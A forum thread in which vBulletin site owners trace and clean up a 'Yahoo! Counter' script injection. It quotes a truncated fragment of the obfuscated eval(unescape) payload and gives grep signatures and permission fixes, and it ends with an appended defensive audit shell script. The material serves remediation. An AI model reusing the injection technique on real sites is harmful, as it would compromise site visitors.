#1
My site VB.3.7.3 VBA 3.0.1 www.udpride.com is currently suffering from the "!-- Yahoo! Counter starts..." trojan that has appended to the footer of all of my forum pages (regardless of template/style). I looked at my footer templates in VB CP and this code is not there. My last code is as it should be -- Site Catalyst page tracking software. However, when you do a view source, the Yahoo code has been appended right after it at the bottom of the pages. Looks like this:
Code:
<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('|/#/@.~.!.................[keeps going]
<!-- counter end --></script>
This trojan has been going around and infecting blogs and forums. It slows the pages down, sets off all kinds of alarms on virus software and can cause major issues with search engine results.
Questions:
1. How did it get there?
2. How do I remove it?
3. What CHMOD permissions should be on my folders and files inside my forums? I noticed in my /forums folders "cache", "includes", and "modules" (vba?) are all 777 permissions. Should all folders be 777 and all files be 644 without exception?
#2
This is a link that has some details about it
You probably need to get some help from your hosting provider.
#3
All my vbulletin folders are 755. If you didn't change them to 777 then the badguy did.
You should look on your server for files that have changed since this problem started. They probably contain a gift from the badguy.
__________________
vbplusme | AllAboutDatingSites | Practical Solutions | Dating4Divers | QualityAdvantages | AsiaWestLoveLink
Last edited by mikesz; 12-19-2008 at 03:48 AM.
#4
I can't find where it is on my forum. It only seems to be on the vBa CPMS screen.
http://daytonasportbikes.com/forum/
#5
Was anyone able to resolve this? I'm still chasing it on my forum.
#6
This hack was a nasty one. Thanks to Michael at VBPlusMe.com, he helped me get out of a jam and clean things up. I couldn't have asked for better assistance. Dave, I'd check with him and see if he can help you, although I just did a quick view source on your pages and didn't see the Yahoo code.
This code buries itself in your footers to the tune of endless random PHP (that obviously means something to someone) and also dumps a Yahoo Counter php script somewhere north of your footer, perhaps in the Meta Description of your VBulletin. You need to get rid of both. There is probably also an htaccess file on your site somewhere and in that same folder you will find an index.htm attributable to these scumbags who dumped the code on you as their calling card. You'll need to remove those as well.
The PHP gibberish is at the tail end of dozens if not hundreds of your PHP files and TMPL files. Start with PHP files that relate to configurations. Also, if you run VB Advanced, check your module PHP files. Most of those will probably have the gibberish as well.
Check your file and folder permissions. The hack may have changed them or exploited incorrect ones. 755 the folders and 644 the files. Michael indicates VB does not need any 777 folders to run (though add-ons might).
It's a painstaking process. The hacked code slows the sites down, sets off all kinds of bells and whistles with users' antivirus etc. Also run MalWareByte (download free at Download.com) to scan your hard drive for any bad guys that may have jumped into your own machine. Last thing is change your passwords. All of them. And when you run into trouble, give a shout out here. I can tell you what I found, and the admins here can work something out with you to take a look and help solve the problem as they did with me.
#7
Quote:
I'm still cleaning my site when I have the time to poke around on it, but my real job seems to be taking up most of my time at the moment. I appreciate the update.
#8
I'm no programmer or database expert but I'll tell you everything I know.
#9
New poster here. I think I may have this on all my sites.
Is this what the malicious code looks like? <script language=javascript><!-- Yahoo! Counter starts <!-- counter end --></script>
It literally may be on every single site I have with my hosting provider. Thanks for the information so far, it's the most I've seen.
#10
Quote:
Do you use ixwebhosting?
#11
Yes, I do use IX webhosting. I was able to free my main site of this scum tonight. Still lots of work to do for the other sites.
I also noticed there were other wrong files in there as well. Go into the CP->scripts folder and look for things like chat, forum, guestlog, weird pictures etc. They always accompanied the yahoo counter virus thing.
I'm seriously wondering how every single one of my sites got nailed with this yahoo counter thing *and* another script that looks like this: <script language=JavaScript></script><!-- yourdomain.com --> normally found in index pages. This blog page really helped me out there: http://mtminds.com/category/malware/
I used Wingrep and was able to search my website folders for the right string, making it easier to find them: http://www.wingrep.com/
For example, download your website folder to your computer, and do a search for "<script language=JavaScript>function " in that folder using wingrep and you will find all the pages on your site that contain that bad code. Same for the yahoo stats counter term, "<script language=javascript><!-- Yahoo! Counter ". Saves a lot of time looking for the code.
Luckily, my main site had a very clean and up to date backup in two places, and I was able to delete the entire thing and just re-upload with no problems.
Also, believe it or not I have found Avast to be much superior to Avir and AVG for finding these problems others were reporting but not me.
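
The checks described across this thread (searching for the two script strings, looking for 777 permissions, stray .htaccess and index.htm pairs, and files changed since the problem started), gathered into one script. This is an added example and not part of any post; the function names and the reference-file argument are assumptions. The PHP appended to file tails has no search string quoted on this page, so only the changed-files check covers it.

```shell
#!/bin/sh
# Audit a forum docroot (or a downloaded copy) for the injection in this thread.
# Usage: sh audit.sh /path/to/forums [reference-file]
# reference-file (assumption): any file last modified before the problem began.

# Search strings quoted in the posts above.
SIG_YAHOO='<script language=javascript><!-- Yahoo! Counter '
SIG_PACKED='<script language=JavaScript>function '

# Files containing either string, matched literally (-F), not as a regex.
find_injected() {
    grep -rlF -e "$SIG_YAHOO" -e "$SIG_PACKED" -- "$1" 2>/dev/null | sort
}

# Anything writable by every account on the host (777 and similar).
find_world_writable() {
    find "$1" ! -type l -perm -0002 -print | sort
}

# Every .htaccess, plus an index.htm in the same folder, for manual review.
find_dropped() {
    find "$1" -type f -name .htaccess -print | sort | while IFS= read -r h; do
        printf '%s\n' "$h"
        if [ -f "$(dirname "$h")/index.htm" ]; then
            printf '%s\n' "$(dirname "$h")/index.htm"
        fi
    done
}

# Files modified after the reference file.
find_changed_since() {
    find "$1" -type f -newer "$2" -print | sort
}

# Reset modes to the values given in the thread: 755 folders, 644 files.
normalize_perms() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

if [ "$#" -ge 1 ]; then
    echo "== injected script markers ==";  find_injected "$1"
    echo "== world-writable paths ==";     find_world_writable "$1"
    echo "== .htaccess / index.htm ==";    find_dropped "$1"
    if [ "$#" -ge 2 ]; then
        echo "== changed since $2 =="; find_changed_since "$1" "$2"
    fi
fi
```

A legitimate install can ship its own .htaccess files, so `find_dropped` lists candidates to inspect rather than files to delete. Run `normalize_perms` only on a copy restored from a clean backup, since resetting modes does not remove injected code.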